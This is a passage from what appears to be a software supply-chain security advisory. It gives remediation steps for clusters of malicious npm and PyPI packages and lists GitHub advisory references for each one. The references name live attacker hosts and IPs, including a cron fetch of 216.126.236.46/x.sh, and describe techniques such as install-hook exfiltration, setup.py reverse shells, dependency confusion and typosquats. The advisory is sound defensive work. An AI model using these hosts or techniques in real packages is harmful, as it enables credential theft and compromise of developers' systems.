/classlink-` bursts + eip712-lite / clmm-fee-audit / borsh-lite / mfa-js / ozturk-mfa)*: uninstall on any hit and rebuild lockfiles. Because 100+ packages are in each burst cluster, add the prefixes themselves to your registry / SCA deny-list. For crypto-themed names (eip712-lite,clmm-fee-audit,borsh-lite): confirm the developer intended the legitimate underlying library (viem/ethersfor EIP-712;@raydium-io/raydium-sdkor@orca-so/whirlpoolsfor CLMM;borshfor the real Solana serialisation library) rather than these lightweight-sounding forks - 12For Cluster K (
calcboxlite+pygame-renderkit): uninstall on hit.calcboxlite's.invalidOAST callback confirms it is out-of-band pentest probing rather than a live campaign against your data, but the install-time HTTP POST still leaks hostname + username.pygame-renderkit's reverse shell insetup.pyis a real hit; any pip environment that installed it should be treated as compromised and rebuilt from scratch - 13For all
npm installruns in CI, prefer--ignore-scripts- Clusters A, B, F, G, H, I all execute via lifecycle scripts (preinstall or postinstall). For allpip installruns in CI, prefer--only-binary=:all:and pin to source hashes - Clusters C, K exploitsetup.pyoverrides on sdist installs. For npm scoped enterprise namespaces, pin scope-registry mappings in.npmrcand deny public-registry fallback on internal-namespace resolution failures - 14Verify none of these packages still resolves via your private mirror (Nexus / Artifactory / Verdaccio / internal npm proxy) - internal caches routinely keep serving yanked tarballs after the public takedown
References
- GitHubGHSA-rg27-qr39-ch6w - @7nohe/openapi-react-query-codegen "Trinitite" worm (tracked separately)github.com
- GitHubGHSA-v75q-x2qc-4c7r - eth-pino@2.0.3 (npm typosquat, ipcheck-hashed.vercel.app eval)github.com
- GitHubGHSA-ffxr-prpr-hxxc - js-array-tokens@1.0.2 (npm js-tokens typosquat, access-token-delta.vercel.app eval)github.com
- GitHubGHSA-8crw-r25r-mwv4 - js-tokens-array (npm js-tokens typosquat, access-token-delta.vercel.app eval)github.com
- GitHubGHSA-cx4f-wffj-qfxm - mfacord (npm Windows Discord-MFA dropper, limbomail.com)github.com
- GitHubGHSA-r4f7-w4j9-xj27 - mfakit@1.4.0 (npm Windows Discord-MFA dropper, limbomail.com; same operator as mfacord)github.com
- GitHubGHSA-wrp2-cvjj-h5jx - secretkey2fa@1.0.1 (npm Minecraft / Microsoft-account stealer)github.com
- GitHubGHSA-v7mw-8r4v-4jqq - supersignaturenature (npm RSA/DES chain via manager-thedate)github.com
- GitHubGHSA-3rww-v3p8-fw9p - manager-thedate (npm payload-rotation channel for supersignaturenature; v1.0.15, v1.0.16 yanked 2026-08-29)github.com
- GitHubGHSA-649g-mjr9-4j74 - techportal@4.0.10 (npm HTTP + DNS beacon to *.oob.asm5.net)github.com
- GitHubGHSA-vg83-965g-3w5v - vs-modules@1.2.2 (npm Windows .bat dropper)github.com
- GitHubGHSA-rjfw-6xw6-qjfx - vitest-chalk-pro@10.0.7 (npm jsonbin.io detached-child C2)github.com
- GitHubGHSA-7v69-f2ff-7267 - intuit-authz (npm repo.securityctrl.com dependency-confusion probe)github.com
- GitHubGHSA-hj36-mq3p-257w - one-intuit-help-system-utils (npm repo.securityctrl.com dependency-confusion probe)github.com
- GitHubGHSA-pqq9-pc7f-qg9c - qbo-ui-services (npm repo.securityctrl.com dependency-confusion probe)github.com
- GitHubGHSA-gh4x-ppwf-3j59 - payments-ui-services (npm repo.securityctrl.com dependency-confusion probe)github.com
- GitHubGHSA-mgjj-8534-64gp - jira-projects-backbone (npm repo.securityctrl.com; Atlassian namespace)github.com
- GitHubGHSA-wxw7-x2qj-6jh2 - confluence-rest (npm repo.securityctrl.com; Atlassian namespace)github.com
- GitHubGHSA-r28g-prq7-6j7p - firestore-lite (npm repo.securityctrl.com; Firebase namespace)github.com
- GitHubGHSA-758g-5xc5-pm3c - amplitude-experiment (npm repo.securityctrl.com; Amplitude namespace)github.com
- GitHubGHSA-g76m-37ph-2w5c - paper-password-input (npm repo.securityctrl.com; react-native-paper lookalike)github.com
- GitHubGHSA-8jwf-jxvr-v3qg - oit-lib-oracle-util (npm repo.securityctrl.com; Oracle namespace)github.com
- GitHubGHSA-h9j7-rx3x-rwhc - nx-app@9999.0.0-security-test (npm repo.securityctrl.com; Nx namespace)github.com
- GitHubGHSA-587j-f248-fmvr - alimama-minisite (npm repo.securityctrl.com; Alibaba namespace)github.com
- GitHubGHSA-g4fg-jh8h-vf3p - librastandardlib (npm repo.securityctrl.com; Libra/Diem namespace)github.com
- GitHubGHSA-58mp-f2cw-5j5r - mkt-ui-library (npm repo.securityctrl.com)github.com
- GitHubGHSA-jv92-xghh-84rr - bui-react-10themes (npm repo.securityctrl.com)github.com
- GitHubGHSA-mr25-fm7h-7p84 - sentrykit (npm repo.securityctrl.com; Sentry-lookalike)github.com
- GitHubGHSA-799x-vgvf-pxp4 - vui-gateway (npm repo.securityctrl.com)github.com
- GitHubGHSA-293v-ghq2-4rr4 - search-reservation (npm repo.securityctrl.com)github.com
- GitHubGHSA-wp54-r527-gf42 - grafeno-auth (npm preinstall + cron 216.126.236.46/x.sh)github.com
- GitHubGHSA-682f-95rp-28w4 - grafeno-client (npm preinstall + cron 216.126.236.46/x.sh)github.com
- GitHubGHSA-hfcc-rc45-2cgg - grafeno-utils (npm preinstall + cron 216.126.236.46/x.sh)github.com
- GitHubGHSA-r3jq-7mgh-v97x - grafeno-config (npm preinstall + cron 216.126.236.46/x.sh)github.com
- GitHubGHSA-qh5m-rwf7-x3r2 - grafeno-api (npm preinstall + cron 216.126.236.46/x.sh)github.com
- GitHubGHSA-6g3v-w4g2-wpjc - grafeno-core (npm preinstall + cron 216.126.236.46/x.sh)github.com
- GitHubGHSA-4wxj-99qv-hg78 - grafeno-pix (npm preinstall + cron 216.126.236.46/x.sh; targets Brazilian PIX rails)github.com
- GitHubGHSA-pv35-j495-vmj4 - grafeno-logger (npm preinstall + cron 216.126.236.46/x.sh)github.com
- GitHubGHSA-fg63-r25c-3gf6 - grafeno-sdk (npm preinstall + cron 216.126.236.46/x.sh)github.com
- GitHubGHSA-p5jf-vqp6-95h5 - eip712-lite (npm CWE-506; Ethereum EIP-712 typosquat)github.com
- GitHubGHSA-68fh-772h-wjfw - clmm-fee-audit (npm CWE-506; Solana CLMM theme)github.com
- GitHubGHSA-6m7x-mwxq-f3wf - borsh-lite (npm CWE-506; Solana Borsh typosquat)github.com
- GitHubGHSA-2p92-fvvr-75hj - mfa-js (npm CWE-506)github.com
- GitHubGHSA-wrj4-48g5-vg88 - ozturk-mfa (npm CWE-506)github.com
- GitHubGHSA-q2qg-w4f2-8v29 - calcboxlite@1.0 (PyPI OAST callback probe)github.com
- GitHubGHSA-53q9-ghm7-r8g3 - pygame-renderkit@1.2.0 (PyPI setup.py reverse shell)github.com
- GitHubGHSA-gmgc-w467-4xf7 - flask-header-guard@1.0.0 (PyPI, same 2026-08-pygame-renderkit campaign; setup.py override, env + file exfil, reverse shell)github.com
- GitHubGitHub Advisory Database - recent npm malware advisoriesgithub.com
- GitHubGitHub Advisory Database - recent pip malware advisoriesgithub.com
- OpenSSFOpenSSF malicious-packages repositorygithub.com